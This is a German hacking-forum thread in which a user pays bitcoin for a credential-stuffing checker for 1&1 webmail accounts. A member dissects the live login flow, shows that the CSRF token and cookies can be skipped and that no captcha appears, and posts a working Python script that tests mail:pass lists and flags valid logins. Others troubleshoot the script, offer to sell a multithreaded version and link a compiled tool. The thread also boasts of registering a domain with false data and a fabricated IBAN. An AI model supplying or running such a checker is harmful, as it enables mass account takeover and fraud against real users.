Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Suche Coder für 1&1 Acc Checker [B] 70€ BTC

- - - - -

  • Bitte melde dich an um zu Antworten
8 Antworten in diesem Thema

#1
dep0x

dep0x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    3
  • 33 Beiträge
  • 1 Bedankt

Hallo ich suche jemanden der mir ein Account Checker für 1und1 coden kann.

Der Checker sollte meine Mail:Pass Listen (auch größere Listen 10k+) aufnehmen können.

 

Wie es aussieht wird doch kein Captcha verlangt und eine Socks-Funktion benötige ich auch nicht.

Ich benötige den Checker so schnell wie möglich und bin bereit 70€ in Bitcoins zu zahlen.

 

Gerne können wir hier (falls möglich) oder in anderen Foren über Treuhand handeln - bei bekannteren User sende ich das Geld auch zuerst.

 

Jabber Kontakt: vetos@exPloit.im


Bearbeitet von killer555, 09 January 2017 - 21:28 Uhr.


#2
Dean36

Dean36

    Lehrling

  • Premium Member
  • Likes
    64
  • 78 Beiträge
  • 109 Bedankt
  • Android [root]
  • Windows, Linux

habe mir vor 1-2 monaten eine für Sentry anfertigen lassen. teile die gerne gegen kleine gebühr! :)



#3
smc2014

smc2014

    Moderator

  • Moderator
  • Likes
    344
  • 576 Beiträge
  • 240 Bedankt
  • Spender
  • Android [root]
  • Windows, Linux

 

Gerne können wir hier (falls möglich) oder in anderen Foren über Treuhand handeln - bei bekannteren User sende ich das Geld auch zuerst.

 

 

Sollte auf ein anderes Forum "gehandelt" werden, möchte ich hier keinen Ripperreport sehen!

 

BR / LG



#4
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

Hab mir mal die Mühe gemacht (allerdings nicht auf diesem Forum):

 

 

Da mal jemand nach einem 1&1 Accountchecker gefragt hat (ich meine es war auf toolbase.bz) habe ich mir mal den Loginprozess von 1&1 angeschaut.
Der Login findet sich an vielen Stellen des CMS, primär allerdings unter

Please Login HERE or Register HERE to see this link!

.

Gleich beim ersten Seitenbesuch setzt das CMS eine Reihe von Cookies:

Set-Cookie: DPX=v1:4nRL3kZLqE:1Zb1QEaW:5878c248:es; Path=/; Expires=Fri, 13-Jan-17 12:04:19 GMT; HttpOnly
Set-Cookie: JSESSIONID=F929149E9C16EAB9E499BD98D9FFC931.TC1a; Path=/; Secure; HttpOnly
Set-Cookie: _PFXSSL_=true; Path=/


JSESSIONID gibt sofort den Aufschluss dass es sich bei dem CMS um eine J2EE Applikation handelt. Der mit "DPX" benannte Cookie gibt leider kaum Information her, scheint zum. nach webcookies.org hauptsächlich von 1und1 Webseiten (sowie amateur-fickerei.net?! :-D) genutzt zu werden

Please Login HERE or Register HERE to see this link!

. "PFXSSL" hat wohl was mit dem TLS-Layer zutun und keine große Auswirkung auf die Seite (beinhaltet auch nur einen boolschen Wert).

Das Relevante an den Cookies ist: Diese werden für den eigentlichen Loginvorgang garnicht benötigt, schickt man also den POST Request ohne cookie-header ab, erwiedert der Server einen set-cookie (auch nach erfolgreichem Login).

Der eigentliche login-request sieht nämlich so aus:

POST

Please Login HERE or Register HERE to see this link!



__lf=Login&__sendingdata=1&oaologin.fp=ae3d18d3dbf79a29efbcefd45992ddd0&oaologin.username=1234567&oaologin.password=passwort


Der Parameter "__lf" hat wohl irgendwas mit der Formularverarbeitung zutun und muss angegeben werden. "__sendingdata" auch. Das als "oaologin.fp" benannte CSRF-token findet sich im Source unter: "<input type="hidden" id="login-form-fp" name="oaologin.fp" value="ae3d18d3dbf79a29efbcefd45992ddd0">" wieder, der Clou: es muss nicht angeben werden ;-). Der Rest ist selbsterklärend, dabei besteht "oaologin.username" aus einem 7-stelligen integer.

Bei n := <= 10 requests, gab es keinerlei captcha-Abfragen oder sonstiges.
Damit ich das ganze mal ausprobieren konnte, habe ich mir schnell eine .website Domain für 1,08 € auf falsche Daten und eine selbstgenerierte IBAN bestellt. Amüsant dass das durchging.

Schlägt ein Login fehl, meldet die Seite:

1hlq8ke.jpg

(200 OK)
Was sich simpel als string "Haben Sie sich vertippt?" matchen lässt. Andernfalls folgt eine temporäre Weiterleitung (302 FOUND).
Das ganze muss man jetzt nur noch in einem python-script zusammenfassen, was die Tage folgen wird.

 

Daraus resultierend das Script:

#!/usr/bin/env python
import requests

for entry in open('mail-pass.txt'):
    login = entry.split(':')

    payload = {'__lf' : 'Login', '__sendingdata' : 1, 'oaologin.fp' : '', 'oaologin.username' : login[0], 'oaologin.password' : login[1]}
    r = requests.post("https://account.1und1.de", data = payload)

    if 'Haben Sie sich vertippt?' in r.text:
        print "[-] invalid"
    elif 'Guten Tag' in r.text:
        print "[+] %s valid" % login[0]

Script selbst erweitern und/oder bezahlen, dann patche ich mutli-threating etc. hinterher.


  • Framerater, fluffybunny, smc2014 und 3 anderen gefällt das

#5
dep0x

dep0x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    3
  • 33 Beiträge
  • 1 Bedankt

Hab mir mal die Mühe gemacht (allerdings nicht auf diesem Forum):

 

 

Daraus resultierend das Script:

#!/usr/bin/env python
import requests

for entry in open('mail-pass.txt'):
    login = entry.split(':')

    payload = {'__lf' : 'Login', '__sendingdata' : 1, 'oaologin.fp' : '', 'oaologin.username' : login[0], 'oaologin.password' : login[1]}
    r = requests.post("https://account.1und1.de", data = payload)

    if 'Haben Sie sich vertippt?' in r.text:
        print "[-] invalid"
    elif 'Guten Tag' in r.text:
        print "[+] %s valid" % login[0]

Script selbst erweitern und/oder bezahlen, dann patche ich mutli-threating etc. hinterher.

 

Besten Dank der Herr - wie lautet aber nun der Befehl um mit dem Script zu arbeiten?

 

Ich habe 1und1.py ausgeührt jedoch kommt folgende Meldung:

RjKHi5c.png

 

Natürlich heisst meine Datei, worin die Mail:Pass enthalten sind mail-pass.txt - und diese Datei liegt im selben Pfad wie 1und1.py


Bearbeitet von killer555, 25 January 2017 - 13:08 Uhr.


#6
Unkiii

Unkiii

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    7
  • 30 Beiträge
  • 6 Bedankt

Besten Dank der Herr - wie lautet aber nun der Befehl um mit dem Script zu arbeiten?

 

Ich habe 1und1.py ausgeührt jedoch kommt folgende Meldung:

RjKHi5c.png

 

Natürlich heisst meine Datei, worin die Mail:Pass enthalten sind mail-pass.txt - und diese Datei liegt im selben Pfad wie 1und1.py

 

 

"Script selbst erweitern und/oder bezahlen, dann patche ich mutli-threating etc. hinterher."


  • dep0x gefällt das

#7
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

Besten Dank der Herr - wie lautet aber nun der Befehl um mit dem Script zu arbeiten?

 

Ich habe 1und1.py ausgeührt jedoch kommt folgende Meldung:

RjKHi5c.png

 

Natürlich heisst meine Datei, worin die Mail:Pass enthalten sind mail-pass.txt - und diese Datei liegt im selben Pfad wie 1und1.py

 

da ist wohl das python-modul "requests" nicht installiert:

pip.exe install requests

  • dep0x gefällt das

#8
dep0x

dep0x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    3
  • 33 Beiträge
  • 1 Bedankt

 

da ist wohl das python-modul "requests" nicht installiert:

pip.exe install requests

Kannst du mir bitte deine Jabber-Adresse per PN schicken? Würde dein Script kaufen, gerne mit Multithreading.

 

 

Ich habe dir bereits eine PN gesendet



#9
Born2Hack

Born2Hack

    = B2H =

  • Elite Member
  • Likes
    369
  • 208 Beiträge
  • 416 Bedankt

Hatte gerade eben kurz Zeit & habe für dich was auf die schnelle zusammengeklatscht.

97cojcfh.jpg

SourceCode:

Please Login HERE or Register HERE to see this link!


VirusScan:

Please Login HERE or Register HERE to see this link!


DL:

Please Login HERE or Register HERE to see this link!

 

Das Ding ist nicht Multithreaded, sprich es läuft sehr langsam.
Wenn jemand Bock hat, kann das ja zu Ende bringen :D

 

 

Hybrid Link:

Please Login HERE or Register HERE to see this link!




 


  • eXact, kl1q54 und cubik gefällt das

q8t3oz6o.png

 

 


Thanked by 1 Member:
the.3nd


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 73 user(s)


    13asim37, 187ers, b0kerst3l, B1nary, baba yugo, Bad Grandpa, Black Cango, Blackhook, Boneau, Born2Hack, Bot4ng, brucereed64, Caruso, cubik, dealerscup, Dean36, dep0x, Djinn, Dr. Spic, eXact, FatalityMods, Flex.Net, fluffybunny, Framerater, g0rillaz, gtawelt, gutzuu, hacked, hanke, hanshenkelman, Haxlor, hlaus777, isi, ItsDezzen, Jackdaniels, jacktha, Joker Dark Knight, keyb0ardz, kiwitone, kl1q54, Kozuki, leonalexkraus, lolorollo, mettbrot, Mr1337speak, nninja, nong_dan, notfound, Onek, PadX18, pi^2, pornoralle, Psykoon303, python_snippet, raakil, raider, Rogerlopensio, SativaBreatha, Sayco, SK4LL3R, smc2014, SonnyBlack, sup3ria, the.3nd, twixeis, Unkiii, Vutra, w0tan, x1z0ng, Z3LuX, Zero-X, ZeroC00L, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.